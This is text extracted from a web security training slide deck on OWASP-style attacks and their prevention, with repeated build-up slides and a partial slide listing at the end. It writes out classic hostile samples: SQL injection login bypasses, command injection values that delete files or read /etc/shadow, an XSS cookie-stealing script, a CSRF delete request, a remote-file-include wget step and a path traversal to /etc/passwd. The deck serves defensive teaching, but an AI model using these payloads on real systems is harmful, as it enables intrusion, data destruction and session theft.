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Web Security attacks and solutions
Cybersecurity attacks
 During the development process, the majority focuses on enriching the features
on accelerating the development process and reduce costs, while ignoring the evil
consequences of this rhythm of development on the safety of the product.
 Attackers are increasingly successful in exploiting the vulnerabilities and the
weakness left by the developers.
 The Top 10 attacks and risks for web application:
 Injection
 Broken Authentication and Session Management
 Cross-Site Scripting (XSS)
 Insecure Direct Object References
 Security Misconfiguration
 Sensitive Data Exposure
 Missing Function Level Access Control
 Cross-Site Request Forgery (CSRF)
 Using Components with Known Vulnerabilities
 Unvalidated Redirects and Forwards
Introduction: Statistics
Source : Zone-H
Introduction: Statistics
Source : Zone-H
Introduction: Statistics
Source : Zone-H
Novembre 2011
Introduction: The Security, Functionality, and Usability Triangle
Introduction: Application attacks evolution
75 %
90 %
25 %
10 %
% Attacks % spending
75% of attacks targeting the application layer
66% of web applications are vulnerable
Web Application
Components Networks
SANS Study
3 of 4 business websites
are vulnerable to attacks
Introduction: Application attacks evolution
Introduction: How is a Hacker?
Introduction: hacker Classes
Introduction: Hacktivism
web technologie
Web design
•SQL Server
•Microsoft IIS
Web Server BD
HTTP protocol
GET /index.html HTTP/1.0
Host :
HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Sun, 9 Fev 2006 10:46:17 GMT
Content-length: 324
Content-type: text/html
Last-modified: Tue, 14
Dec 2005 16:38:08 GMT
Connection: close
<blank line>
<html> <head></head>
Welcom to web Site.
HTTP protocol
HTTP Methods
Requests using GET should only retrieve data and
should have no other effect.
Form variables stored in URL
Same as GET, but transfers the status line and header
section only.
Return information about the document header (File
size, modification date, server version)
A POST request is used to send data to the server, for
example, customer information, file upload, etc. using
HTML forms.
Form variables sent as content of HTTP request
Replaces all current representations of the target
resource with the uploaded content.
Removes all current representations of the
target resource given by a URI.
Describes the communication options for the target
The TRACE method echoes the received request so
that a client can see what (if any) changes or
additions have been made by intermediate
Establishes a tunnel to the server identified by a given
(example SSL)
HTTP protocol
HTTP - Status Codes
S.N. Code and Description
1 1xx: Informational
t means the request has been received and the process is continuing.
2 2xx: Success
It means the action was successfully received, understood, and accepted.
3 3xx: Redirection
It means further action must be taken in order to complete the request.
4 4xx: Client Error
It means the request contains incorrect syntax or cannot be fulfilled.
5 5xx: Server Error
It means the server failed to fulfill an apparently valid request.
HTTP protocol
Web Application
http:// login.php? login=acheteur&password=pass2006
•Microsoft IIS
•SQL Server
HTTP protocol
 Parameters types:
 Paramerters GET:In an HTTP GET request, parameters are sent as a
query string:
 Paramerters POST: In an HTTP POST request, the parameters are not
sent along with the URI.
 Paramerters Cookies: Variables retained by the browser on your hard drive and
generally provided by the server .
The main problem in recent years : application
-90% of intrusive tests : application
-≃ 100% of cases : presence of exploitable vulnerabilities
Why ?
Fast changing in the web technology(Web 2.0, Web Services ...)
Too little secutity awareness and trainaing for the developers
Handling the security aspects too late
Lack of time and budget
⇒ Production start with exploitable vulnerabilities.
web application are the easy door for hackers
Webshell ?
Malicious web page that provides attacker functionality:
− File transfer
− Command execution
− Network reconnaissance
− Database connectivity
− …
Server-side scripting
− PHP, ASP, ASPX, JSP, CFM, etc…
Base des
Webshell ?
Get a file on a web server
External attack vectors
− SQL injection
− File upload
− Exposed admin interface
Low “barrier to entry”
− Lots of publicly available malware
− Lots of web app vulnerabilities
− Trivial to use
Webshell ?
Web attacks
Essential Terminologies
Essential Terminologies
Web attacks
• Tricking an application into including unintended commands
in the data sent to an interpreter
• Take strings and interpret them as commands
• SQL, OS Shell, LDAP, XPath, etc…
• Technical:Injection can result in data loss or corruption,
lack of accountability, or denial of access.
• Business: All data could be stolen, modified, or deleted.
Could your reputation be harmed?
SQL Injection
 technique that allows attackers to inject SQL queries
directly on the database that is behind a Web server, by manipulating
the input "INPUT" to an application.
Example : a login page "login.asp", the user is prompted to enter a
user name "User1" and password "pass2015", this operation results in
the form of a SQL query:
SELECT * FROM Users WHERE user='User1' and password=
SQL Injection
This request must return to the application one or more fields
from the database. Suppose the user enter the value of the user
name value 'or 1 = 1-- "the request will be in the form
SELECT * FROM Users WHERE user=' or 1=1-- and
password =''
SQL Injection
In the case of SQL Server, "--" is used to post a comment to the
end of the line, the request would be
SELECT * FROM Users WHERE user= “ or 1=1
The query will return all the fields in the user table and the
attacker would be authenticated.
The attacker was successful as to authenticate without using a
user name or password.
‘ or 1=1 #
SQL Injection
With admin privilege
SQL Injection
SQL INJECTION – Prevention
1. Use an interface that supports bind variables (e.g., prepared
statements, or stored procedures),
2. Bind variables allow the interpreter to distinguish between
code and data
3. Encode all user input before passing it to the interpreter
4. Always perform ‘white list’ input validation on all user
supplied input
5. Always minimize database privileges to reduce the impact of
a flaw
-For more details, read the :
Command Injection/Injection OS
Command injection attack consists :
- To inject and execute some commands by the attacker in the
vulnerable application.
- However, the commands are executed on the target server and
the attacker has a partial or full access to the hosting server.
- The attacker can add their own code to the existing code to
extend the application of the default functionality without the
need to run system commands.
echo system("ls -1 *.".$_GET['ext']);
listing.php ?>
2 ls -1 *. php;cd/;rm+-Rf+*
Command Injection/Injection OS
Example Language: Java
String ping= request.getParameter ("cmd");
An attacker execute arbitrary commands with hight privileges
by injecting through the application for example in the input
ping arbitrary code eg " | cat / etc / shadow" to
display all the passwords of system users crypted in MD5.
Command Injection/Injection OS
 Avoid using functions that could call shell commands.
 When you use functions which could call shell
commands, check all input parameters that do not
contain system commands.
Command Injection/Injection OS
Cross site scripting
Cross-Site Request Forgery
 This technique is to inject Javascript, VB, ActiveX, through
web browser the aim to access to informations, cookies,
configuration ...
 The XSS attack primarily affects the user, and in some cases
can even execute commands on the machine.
 No effective protection client-side just you must disable the
execution of java scripts, ActiveX making navigation difficult.
Cross site scripting(XSS)
 These data are can be:
 Stored in database
 Reflected from web input (form field, hidden field, URL, etc…)
 Sent directly into rich JavaScript clientVirtuellement toute
application Web est vulnérable
 Try this in your browser
 javascript:alert(‘’XSS’’);
 javascript:alert(document.cookie);
 Impact:
 Steal user’s session, steal sensitive data, rewrite web page,
redirect user to phishing or malware site
 Most Severe: Install XSS proxy which allows attacker to observe
and direct all user’s behavior on vulnerable site and force user to
other sites
Cross site scripting(XSS)
No pages were found: Muscat
Search engine
classic scenario
Cross site scripting(XSS)
Moteur de recherche
Scénario classique
Cross site scripting(XSS)
Email :
Ok Cancel
Cross site scripting(XSS)
Cross site scripting(XSS)
1.Example XSS
 Attack stored on the web server
XSS sent by the hacker
Smith <script
Application SGBD
nom tarek<script src=></script>
Cross site scripting(XSS)
1.Example XSS
 Attack stored on the web server
 XSS sent by the hacker
 access to a resource causes the execution XSS
1 GET liste_inscrits.php
Smith <script src= /bad.js
Smith <script src=></</script>
Cross site scripting(XSS)
1.Example XSS
1 GET listeinscrits.php
Smith <script
Smith <script src=></script>
Cross site scripting(XSS)
 Attack stored on the web server
 XSS sent by the hacker
 access to a resource causes the execution XSS
1.Example XSS
1 GET liste_inscrits.php
Smith <script
document.write(‘<img src=’+document.cookie+’ width=1>’) 4
Cross site scripting(XSS)
 Attack stored on the web server
 XSS sent by the hacker
 access to a resource causes the execution XSS
1.Example XSS
1 GET listeinscrits.php
Smith <script
document.write('<img src='+document.cookie+' width=1>')
Cross site scripting(XSS)
 Attack stored on the web server
 XSS sent by the hacker
 access to a resource causes the execution XSS
1.Example XSS
1 GET liste_inscrits.php
Smith <script
vol de session idsess=akkmm98g56x 6
document.write('<img src='+document.cookie+' width=1>') 4
GET c.js
Cross site scripting(XSS)
 Attack stored on the web server
 XSS sent by the hacker
 access to a resource causes the execution XSS
2. Example XSS
 Reflected Attack
 Pirate establish a XSS (email, web page link)
Cross site scripting(XSS)
2.Exemple XSS
 Internet user: XSS sends to the server (click on a link in email
/ page, automatic download of a resource?)
Cross site scripting(XSS)
 Reflected Attack
 Pirate establish a XSS (email, web page link)
2. Example XSS
 Reflected Attack
 Pirate establish a XSS (email, web page link)
 Internet user: XSS sends to the server (click on a link in email
/ page, automatic download of a resource?)
 Web server: Receive and return the XSS
Cross site scripting(XSS)
2. Example XSS
 Web browser : execute XSS
Cross site scripting(XSS)
 Reflected Attack
 Pirate establish a XSS (email, web page link)
 Internet user: XSS sends to the server (click on a link in email
/ page, automatic download of a resource?)
 Web server: Receive and return the XSS
XSS– Prevention
• Eliminate Flaw
• Don’t include user supplied input in the output page
• Defend Against the Flaw
• Use Content Security Policy (CSP)
• Primary Recommendation: Output encode all user supplied input (Use
OWASP’s ESAPI or Java Encoders to output encode)
• Perform ‘white list’ input validation on all user input to be included in page
• For large chunks of user supplied HTML, use OWASP’s AntiSamy to sanitize
this HTML to make it safe
• For how to output encode properly, read the
Site Scripting) Prevention Cheat Sheet
 The XSS can be prevented during the application development phase. It should
validate all INPUT and OUTPUT of the application; remove all the special
characters will be used in a script.
 The XSS can be avoided if the application replaces special characters with those
listed below before posting them on the browser:
< &lt;
> &gt;
( &#40;
) &#41;
# &#35;
& &#38;
 There are already available functions according to the language used
 HtmlEncode() – ASP
 Htmlentities() – PHP
 Taglibs ou la classe javax.swing.text.html – J2EE
 escapeHTML() – Perl
 For how to output encode properly, read the
Site Scripting) Prevention Cheat Sheet
XSS– Prevention
Cross Site Request Forgery (CSRF)
• An attack where the victim’s browser is tricked into issuing a
command to a vulnerable web application
• •Vulnerability is caused by browsers automatically including user
authentication data (session ID, IP address, Windows domain
credentials, …) with each request
• What if a hacker could steer your mouse and get you to click on
links in your online banking application?
• What could they make you do?
• Initiate transactions (transfer funds, logout user, close account)
• Access sensitive data
• Change account details
Add comment
<img src='article.php?id=3&action=del'
Malicious user
Add comment
<img src='article.php?id=3&action=del'
malicious user
2 GET article.php?id=3&action=read
illegitimate user
Ajouter un commentaire
<img src='article.php?id=3&action=del'
malicious user
2 GET article.php?id=3&action=read
illegitimate user <img src='article.php?id=3&action=del' width='0'>
session attacks
Add comment
<img src='article.php?id=3&action=del'
membre d’un
site protégé 3
2 GET article.php?id=3&action=read
membre d’un <img src='article.php?id=3&action=del' width='0'>
site protégé
GET http://.../article.php?id=3&action=del
• Add a secret, not automatically submitted, token to ALL sensitive requests
–This makes it impossible for the attacker to spoof the request
•(unless there’s an XSS hole in your application)
–Tokens should be cryptographically strong or random
–Store a single token in the session and add it to all forms and links
•Hidden Field: <input name="token" value="687965fdfaew87agrde"
•Single use URL: /accounts/687965fdfaew87agrde
•Form Token: /accounts?auth=687965fdfaew87agrde …
–Beware exposing the token in a referer header
•Hidden fields are recommended
–Can have a unique token for each function
•Use a hash of function name, session id, and a secret
–Can require secondary authentication for sensitive functions (e.g., eTrade)
•Don’t allow attackers to store attacks on your site
–Properly encode all input on the way out
–This renders all links/requests inert in most interpreters
See the:
for more details
CSRF– Prevention
Broken Authentication and Session Management
• Means credentials have to go with every request
• Should use SSL for everything requiring authentication
HTTP is a “stateless” protocol
• SESSION ID used to track state since HTTP doesn’t
• and it is just as good as credentials to an attacker
• SESSION ID is typically exposed on the network, in browser, in
logs, …
Session management flaws
• Change my password, remember my password, forgot my
password, secret question, logout, email address, etc…
Beware the side-doors
• User accounts compromised or user sessions hijacked
Broken Authentication Illustrated
Custom Code
1 User sends credentials
(Site uses URL rewriting
(i.e., put session in URL)
3 User clicks on a link to in a forum
Hacker checks referrer logs on
and finds user’s JSESSIONID
Hacker uses JSESSIONID
and takes over victim’s
Avoiding Broken Authentication and Session Management
 Verify your architecture
 Authentication should be simple, centralized, and standardized
 Use the standard session id provided by your container
 Be sure SSL protects both credentials and session id at all times
 Verify the implementation
 Forget automated analysis approaches
 Check your SSL certificate
 Examine all the authentication-related functions
 Verify that logoff actually destroys the session
 Follow the guidance from
 Session based on a unique identifier
Hi Zorro 2
Session hijacking
 Session based on a unique identifier
 Diverting a session id = provide a valid
Hi Zorro 2
Session hijacking
 Identifier transmitted by:
 Cookie
 URL (query string)
 Hidden form imput
Session hijacking
 Session based on a unique identifier
 Diverting a session id = provide a valid
 Identifier transmitted by cookie, URL, form field.
 Attacker get a valid identifier
 Prediction
id = integer incremented
Session hijacking
 Session based on a unique identifier
 Diverting a session id = provide a valid
 Theft
o id in the URL (history, bookmark, logs, email sending, ..
o cookie theft (XSS, public computer)
o interception (Network Sniffer)
Session hijacking
 Identifier transmitted by cookie, URL, form field.
 Attacker get a valid identifier
 Prediction
id = integer incremented
 Session based on a unique identifier
 Diverting a session id = provide a valid
The vulnerabilities authentication
and authorization
Brute Force:
Brute force attacks work by calculating every possible combination that could make up a password
and testing it to see if it is the correct password. This means short passwords can usually be
discovered quite quickly, but longer passwords may take decades.
Username = Jon
Passwords = smith, michael-jordan, [pet names], [birthdays],
names], ….
Usernames = Jon, Dan, Ed, Sara, Barbara, …..
Password = 12345678
2 types:
Login Password
Login Password
N 1
Brute force
Insufficient Authentication
Insufficient Authentication occurs when a web site permits an attacker to
access sensitive content or functionality without having to properly
authenticate. Web-based administration tools are a good example of
web sites providing access to sensitive functionality. Depending on the
specific online resource, these web applications should not be directly
accessible without requiring the user to properly verify their identity.This
approach to security is called "Security Through Obscurity".
Many web applications have been designed with administrative
functionality located directly off of the root directory (/admin/). This
directory is usually never linked from anywhere on the web site, but
can still be accessed using a standard web browser. The user or
developer never expected anyone to view this page because it is not
linked, so enforcing authentication is many times overlooked. If
attackers were to simply visit this page, they would obtain complete
administrative access to the web site.
Insufficient Authentication
Insufficient Authorization:
When a user is authenticated to a web site, it does not necessarily mean that the
user should have full access to all content and functionality.
Same example as /admin/ but after authenticate.
Insufficient Authorization
 Privilege escalation is the act of exploiting a bug, design flaw or
configuration oversight in an operating system or software
application to gain elevated access to resources that are normally
protected from an application or user.
 The result is that an application with more privileges than
intended by the application developer or system administrator can
perform unauthorized actions.
 Production:
 Exploiting bugs
 Maintain access
 Impact:
 Access to system resources.
 ID Theft.
 Setting up a backdoor
Privilege escalation
Privilege escalation occurs in two forms:
 Vertical escalation: Obtain more privileges (Administrator Role).
• User A has access to his bank account in a internet baking .
• The vulnerability occurs when the user A accesses to the internet banking
administrator account by doing same malicious activity.
 Horizontal escalation: Carry out actions or access resources on other user
accounts have the same privilege.
• User A has access to their own bank account in an Internet Banking
• User B has access to their own bank account in the same Internet Banking
• The vulnerability occurs when User A is able to access User B's bank
account by performing some sort of malicious activity.
Privilege escalation
Insecure Direct Object References
• This is part of enforcing proper “Authorization”, along with
Failure to Restrict URL Access
How do you protect access to your data?
• Only listing the ‘authorized’ objects for the current user, or
• Hiding the object references in hidden fields
• … and then not enforcing these restrictions on the server
• This is called presentation layer access control, and doesn’t
• Attacker simply tampers with parameter value
A common mistake …
• Users are able to access unauthorized files or data
 The attacker notices
the parameter acct =
 the hacker modifies
the following manner
 The hacker shows
another account
Insecure Direct Object References
 The attacker notices the
URL (the role is
 The attacker alter the
URL (role)
/admin/getAccounts, or
 The hacker have more
Insecure Direct Object References
File manipulation
Directory indexing:
Listing / indexing Automatic of a directory is a web server
function that lists all the files in a requested directory if the base
file (index.html / home.html / default.htm) is not present.
critical information can be obtained.
Présence de fichiers .bak .old et même des .conf .config
Directory indexing
 The include file technique can execute dynamic code
hosted on a remote server on the target server,
 Using an include () function is the same to make a
simple copy-paste: the code of the called file is
inserted into the calling page, in the exact place
where the function is located.
 This attack was born following the wrong call
parameters by the function include ().
Remote File Include
1 <?php
Injection du caractère null 0
GET bad.txt
echo system('cd /tmp; ls;
wget; ls');
GET bad.txt
test.php <?php
echo system('cd /tmp; ls;
wget; ls');
echo system('cd /tmp; ls;
wget; ls');
GET bad.txt
cd /tmp; ls
test.php <?php
echo system('cd /tmp; ls;
wget; ls');
echo system('cd /tmp; ls;
wget; ls');
GET bad.txt
4 wget
test.php <?php /tmp
echo system('cd /tmp; ls;
wget; ls');
Example :
# def des constantes
$file = "toto.php";
#pour avoir un register global
if (isset($HTTP_GET_VARS)) {
while(list($var,$val)=each($HTTP_GET_VARS)) {
#include de la lib toto.php
include ($file);
A call type: GET /index.php?file=
‘code_hostile.txt’ will result to execute
arbitrary PHP code on the server.
Remote File Include
file Insert:
{include $_GET['page'].'.php';}
{include 'accueil.php';}
Remote File include:
•Remote inclusion of file.
•The remote execution of source files (PHP, JSP, ASP, ...) on your web
WEBSHELL install on your server: Total Control, system commands
Remote Execution ..
Remote File Include
Remote File Include
A path traversal attack (also known as directory traversal) aims to access
files and directories that are stored outside the web root folder. By
manipulating variables that reference files with “dot-dot-slash (../)” sequences
and its variations or by using absolute file paths, it may be possible to access
arbitrary files and directories stored on file system including application
source code or configuration and critical system files.
This attack is also known as “dot-dot-slash”, “directory traversal”, “directory
climbing” and “backtracking”. ../../../../../etc/passwd
Directory traversal
Remote File Upload:
• Generally the site have a page to upload images, CVs, articles, etc ...
•Absence or insufficiency of control over the types of files to upload.
•The hacker trying to upload files (PHP, JSP, ASP, etc ..) to have control
on the remote web server.
 La Remote File upload is a door that allows an attacker to access the web
-totale access.
-Access to OS.
-theft criticals informations(Passwords,customer portfolios, etc..)
Remote file upload
File manupilation– Prevention
 Recommandations
 Block the path of the files located below the website
directory(chroot mechanism);
 Disable the display of files in a directory not containing index
file ( "Directory Browsing");
 Delete unnecessary files and directories (including hidden
 Make sure the server protects access to directories containing
sensitive data;
Logical attacks
Denie de service
Denial of Service
The Denial of Service (DoS) attack is focused on making a
resource (site, application, server) unavailable for the purpose it
was designed.
There are many ways to make a service unavailable for legitimate
users by manipulating network packets, programming, logical, or
resources handling vulnerabilities, among others.
Using SQL injection to erase the contents of the database of a
Abuse of functionality
Abuse of functionality:
Abuse of functionality, sometimes referred to as a "business logic
attack", depends on the design and implementation for
application functions and features. As functionality is added to
applications, thought must be given to how the function or
feature can be manipulated to circumvent the business process,
or abused to perform a function not intended by the developer.
-Using a send-mail form to generate spam
Insufficient Anti-automation:
• Insufficient Anti-automation occurs when a web application permits an attacker to automate a
process that was originally designed to be performed only in a manual fashion, i.e. by a human web
• Web application functionality that is often a target for automation attacks may include:
• Application login forms – attackers may automate brute force login requests in an attempt
to guess user credentials
• Service registration forms – attackers may automatically create thousands of new accounts
• Email forms – attackers may exploit email forms as spam relays or for flooding a certain
user’s mailbox
• Account maintenance – attackers may perform mass DoS against an application, by
flooding it with numerous requests to disable or delete user accounts
• Forms tied to SQL database queries - these may be exploited in order to perform a denial of
service attack against the application. The attack is performed by sending numerous heavy
SQL queries in a short period of time, hence denying real users from service.
• Web-based SMS message sending - attackers may exploit SMS message sending systems in
order to spam mobile phone users
Insufficient Anti-automation:
-An application that allows users to view their account details, by directly accessing a URL similar to
the following:
-Where XYZ denotes an Account ID number.
-If the application issues predictable (or enumerable) Account ID numbers, and also does not employ
anti-automation mechanisms, an attacker could write an automated script, which would submit
massive amounts of HTTP requests, each with a different Account ID number, and then harvest user
account information from the response page.
-In this example, the application suffered from several vulnerabilities, all of which contributed to the
success of the attack :
-Insufficient Anti-automation: web users were allowed to submit a large amount of service
requests, without any mechanism to limit them. For example, After 3 invalid attempts, the IP
address should have been blocked for a "chilling period", or should require that the user will contact the
service provider over the phone
-Insufficient Authentication: unauthenticated web users were allowed to access sensitive application
Insufficient Anti-automation:
-An application that allows users to view their account details, by directly accessing a URL similar to
the following:
-Where XYZ denotes an Account ID number.
-If the application issues predictable (or enumerable) Account ID numbers, and also does not employ
anti-automation mechanisms, an attacker could write an automated script, which would submit
massive amounts of HTTP requests, each with a different Account ID number, and then harvest user
account information from the response page.
-In this example, the application suffered from several vulnerabilities, all of which contributed to the
success of the attack :
-Insufficient Anti-automation: web users were allowed to submit a large amount of service
requests, without any mechanism to limit them. For example, After 3 invalid attempts, the IP
address should have been blocked for a "chilling period", or should require that the user will contact the
service provider over the phone
-Insufficient Authentication: unauthenticated web users were allowed to access sensitive application
Insufficient Anti-automation:
-CAPTCHA:A common practice for protecting against automation attacks is the implementation of
CAPTCHA mechanisms in web applications. CAPTCHA stands for "Completely Automated Public
Turing test to Tell Computers and Humans Apart“.
-Provide configurable per-user/session request rate limits, For example, an administrator should be
allowed to combine "10 requests per minute" with "500 requests per day" in order to simultaneously
apply policies which prevent users from automatic crawling/screen scraping as well as longer-term
slow leeching activities.
Abuse of functionality/Insufficient Anti-automation
Security Misconfiguration
Security Misconfiguration
• We think to networks, systems and platforms
• We must not forget the development environments
Web applications rely on a secure foundation
• Think of all the places your source code goes
• Security should not require secret source code
• All credentials should change in production
Is your source code a secret?
• Install backdoor through missing OS or server patch
• Unauthorized access to default accounts, application functionality or
data, or unused but accessible functionality due to poor server
Hardened OS
Web Server
App Server
Security Misconfiguration Illustrated
App Configuration
Custom Code
Test Servers
QA Servers
Source Control
Avoiding Security Misconfiguration
• Verify your system’s configuration management
 Secure configuration “hardening” guideline
• Automation is REALLY USEFUL here
 Must cover entire platform and application
 Analyze security effects of changes
• Can you “dump” the application configuration
 Build reporting into your process
 If you can’t verify it, it isn’t secure
• Verify the implementation
 Scanning finds generic configuration and missing
patch problems
It is the act of tricking someone into giving confidential
information (like passwords and credit card information) on
a fake web page or email form pretending to come from a
legitimate company (like their bank).
For example: Sending an e-mail to a user falsely
claiming to be an established legitimate enterprise in an
attempt to scam the user into surrendering private
information that will be used for identity theft.
Best practices
Security programming
best practices
 SQL injection vulnerabilities are commuted at source code
during application programming:
 software developers create dynamic database queries that
include the input provided by the user.
To avoid SQL injection attacks is simple. Developers should
a) stopped writing dynamic queries, and / or,
b) prevent the entry provided by the user that contains SQL verbs
How to prevent SQL Injection
Primary Defenses:
Option #1: Use of Prepared Statements (Parameterized
Option #2: Use of Stored Procedures
Option #3: Escaping all User Supplied Input
Additional Defenses:
Also Enforce: Least Privilege
Also Perform: White List Input Validation
How to prevent SQL Injection
Option #1: Use of Prepared Statements (Parameterized Queries)
Parameterized queries force the developer to first define all the
SQL code, and then pass in each parameter to the query later.
Java EE – use PreparedStatement() with bind variables
.NET – use parameterized queries like SqlCommand() or OleDbCommand() with bind variables
PHP – use PDO with strongly typed parameterized queries (using bindParam())
How to prevent SQL Injection
How to prevent SQL Injection
Example #1: Prepared Statements
How to prevent SQL Injection
Example #2: Prepared Statements
How to prevent SQL Injection
Example #3: Prepared Statements
How to prevent SQL Injection
C# .NET Prepared Statement Example
String query = "SELECT account_balance FROM user_data WHERE user_name
= ?";
try {
OleDbCommand command = new OleDbCommand(query, connection);
command.Parameters.Add(new OleDbParameter("customerName",
CustomerName Name.Text));
OleDbDataReader reader = command.ExecuteReader(); // … }
catch (OleDbException se) { // error handling }
How to prevent SQL Injection
Option 2: Stored Procedures
 The difference between prepared statements and stored
procedures is that the SQL code for a stored procedure is
defined and stored in the database itself, and then called from
the application.
 Both of these techniques have the same effectiveness in
preventing SQL injection so your organization should choose
which approach makes the most sense for you.
How to prevent SQL Injection
Example PHP-Stored Procedures
Developers may also specify parameters that hold values both input and
output; the syntax is similar to output parameters. In this next example, the
string 'hello' is passed into the stored procedure, and when it returns, hello is
replaced with the return value of the procedure.
How to prevent SQL Injection
 Option #3: Escaping all User Supplied Input :
addslashes() :
The addslashes() function returns a string with backslashes in front of predefined
The predefined characters are:single quote ('),double quote ("),backslash (),NULL
Escapes special characters in a string for use in an SQL statement
ereg :
The ereg function apply a regular expression on a chain for example to validate
an identity card number : ereg("^[0-9]{8}$", @$num). (prevent SQL injection
and XSS)
Validations des types des inputs:
The following functions allows us to verify the types of inputs after their
manipulation: is_ array ,is_ binary ,is_ bool ,is_ buffer ,is_ callable ,is_
double ,is_ float ,is_ int , is_ integer ,is_ long ,is_ null ,is_ numeric ,is_
object ,is_ real ,is_ resource ,is_ scalar , is_ string , is_ unicode.
How to prevent SQL Injection
How to prevent SQL Injection
 Solution: la validateur du Struts.
Use the Struts libraries that allows us to validate all data types
(org.apache.commons.validator.routines) and which contains for example:
 Date and Time Validators,
 Numeric Validators ,
 Regular Expression validation
 General Code Validation
 ISBN Validation
 IP Address Validation
 Email Address Validation
 URL Validation
 Domain Name Validation
 This library allows us to avoid all types ofsql injection ,XSS, injection du
code,file include etc..
*For more information:
• htmlentities() , htmlspecialchars():
htmlentities($ch), htmlspecialchars($ch) converts all special characters to their HTML
Example :
– "&" becomes"&amp;"
– """ becomes"&quot; " or "&#039;"
– "<" becomes "&lt;"
– ">" becomes "&gt;"
Java: Struts validator.
• HTMLEncode :
server.HTMLEncode converts all special characters to their HTML entity.
Example: server.HTMLEncode("<") becomes &lt;
• IsNumeric :test if an entry is digital and this helps us to avoid SQL injection in the type numeric
Microsoft Anti-Cross Site Scripting Library:
AntiXSSLibrary.HtmlEncode et AntiXSSLibrary. UrlEncode
 let the following characters: (. a-z A-Z 0-9, - _ '') anf all other characters will be encoded.
Prevent XSS
Returns true if the filename exists and FALSE if not. (prevent the file include).
Prevent File manupilation
Insertion de fichier(File include vulnerability
{include $_GET['page'].'.php';}
{include 'accueil.php';}
if(isset($_GET['page']) AND file_exists($_GET['page'].'.php'))
{include $_GET['page'].'.php';}
include 'accueil.php';
boolean exists = (new File("filename")).exists();
if (exists) { // File or directory exists }
else { // File or directory does not exist }
if ( File.Exists(file name) )
{ // File or directory exists }
website administration
best practices
Side "application"
Side "application"
1) Securing the hosting platform:
 Update and server hardening.
 Network intrusion detection.
 Host intrusion detection (HIDS).
 Anti-Virus detection
 application filtering
Side "application"
2) Monitoring and reviews the platform access logs :
 Administrators logs
 Public Access logs,
Side "application"
3. Backup of sensitive data :
 Source code,
 Databases,
Side "application"
4) Application validation:
 After insert or add new services ... by a third entity.
 Pentest the application before it online :
 At this phase all the documentation relating to the
application must be requested (Design, Structure,
Side "application"
5) Regular Security audit :
 Application,
 Web sever,
Side "application"
6) Implement a business continuity plan:
 virtualization.
 Others solutions.
Side «Webmaster»
Side «Webmaster»
1) Securing the webmaster station's website::
 Install and update an antivirus solution
 Update applications and operating system
(security patch)
 Install up a personal firewall
Side «Webmaster»
2) Webmaster station physical security :
 Using an anti-theft device
 System Lock in case of non-use
 Data encryption
Side «Webmaster»
3) Passwords management :
 periodically changing passwords
 secure storage of passwords if necessary
 Protecting passwords against disclosure
Side «Webmaster»
4) Access control:
 Restrict access to administration (by IP
address, e-certificate)
 Using the secure administration methods
(SSH, SCP, ...)
Side «Webmaster»
5) Defline Security Advisory Alerts and Warnings:
 To be updated of new vulnerabilities.
 Apply security patches in optimal time.
 To guarantee its flow the OCERT website.
Hardening web hosting
FirewallExternal network
Hosted Application
Web Application
Green SQL
Hardening web hosting platform
Hardening web hosting platform
 CIS Security Secure Configuration Benchmarks
 NIST hardening standards
 editor official website
 Windows
 Linux
 Oracle
 Apache
 Etc. …..
Thank you!!!

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Attques web

  • 1. LOGO Web Security attacks and solutions Cybersecurity attacks Eng.Tarek MOHAMED ISO 27001 LA, ISO 27001 LI, ISO 27005 RM,MEHARI ADVANCED,CEH,CHFI,ECSP
  • 3.  During the development process, the majority focuses on enriching the features on accelerating the development process and reduce costs, while ignoring the evil consequences of this rhythm of development on the safety of the product.  Attackers are increasingly successful in exploiting the vulnerabilities and the weakness left by the developers.  The Top 10 attacks and risks for web application:  Injection  Broken Authentication and Session Management  Cross-Site Scripting (XSS)  Insecure Direct Object References  Security Misconfiguration  Sensitive Data Exposure  Missing Function Level Access Control  Cross-Site Request Forgery (CSRF)  Using Components with Known Vulnerabilities  Unvalidated Redirects and Forwards Introduction
  • 6. Introduction: Statistics Source : Zone-H Novembre 2011
  • 7. Introduction: The Security, Functionality, and Usability Triangle
  • 8. Introduction: Application attacks evolution 75 % 90 % 25 % 10 % % Attacks % spending GARTNER Study 75% of attacks targeting the application layer 66% of web applications are vulnerable Web Application Components Networks SANS Study
  • 9. 3 of 4 business websites are vulnerable to attacks Introduction: Application attacks evolution
  • 10. Introduction: How is a Hacker?
  • 15. HTTP protocol Request GET /index.html HTTP/1.0 Host : HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Sun, 9 Fev 2006 10:46:17 GMT Content-length: 324 Content-type: text/html Last-modified: Tue, 14 Dec 2005 16:38:08 GMT Connection: close <blank line> <html> <head></head> <body> Welcom to web Site. </body> </html>
  • 16. HTTP protocol HTTP Methods GET Requests using GET should only retrieve data and should have no other effect. Form variables stored in URL HEAD Same as GET, but transfers the status line and header section only. Return information about the document header (File size, modification date, server version) POST A POST request is used to send data to the server, for example, customer information, file upload, etc. using HTML forms. Form variables sent as content of HTTP request PUT Replaces all current representations of the target resource with the uploaded content. DELETE Removes all current representations of the target resource given by a URI. OPTIONS Describes the communication options for the target resource. TRACE The TRACE method echoes the received request so that a client can see what (if any) changes or additions have been made by intermediate servers. CONNECT Establishes a tunnel to the server identified by a given URI. (example SSL)
  • 17. HTTP protocol HTTP - Status Codes S.N. Code and Description 1 1xx: Informational t means the request has been received and the process is continuing. 2 2xx: Success It means the action was successfully received, understood, and accepted. 3 3xx: Redirection It means further action must be taken in order to complete the request. 4 4xx: Client Error It means the request contains incorrect syntax or cannot be fulfilled. 5 5xx: Server Error It means the server failed to fulfill an apparently valid request.
  • 18. HTTP protocol Web Application http:// login.php? login=acheteur&password=pass2006 •Microsoft IIS •Apache •… •ASP •Java •PHP •JSP •Perl •CGI •… •ADO •ODBC •… •SQL Server •Oracle •MySql •Postgres •… Web Server DB Request
  • 19. HTTP protocol  Parameters types:  Paramerters GET:In an HTTP GET request, parameters are sent as a query string:  Paramerters POST: In an HTTP POST request, the parameters are not sent along with the URI.  Paramerters Cookies: Variables retained by the browser on your hard drive and generally provided by the server .
  • 20. The main problem in recent years : application -90% of intrusive tests : application -≃ 100% of cases : presence of exploitable vulnerabilities Why ? Fast changing in the web technology(Web 2.0, Web Services ...) Too little secutity awareness and trainaing for the developers Handling the security aspects too late Lack of time and budget ⇒ Production start with exploitable vulnerabilities. web application are the easy door for hackers
  • 21. Webshell ? Malicious web page that provides attacker functionality: − File transfer − Command execution − Network reconnaissance − Database connectivity − … Server-side scripting − PHP, ASP, ASPX, JSP, CFM, etc…
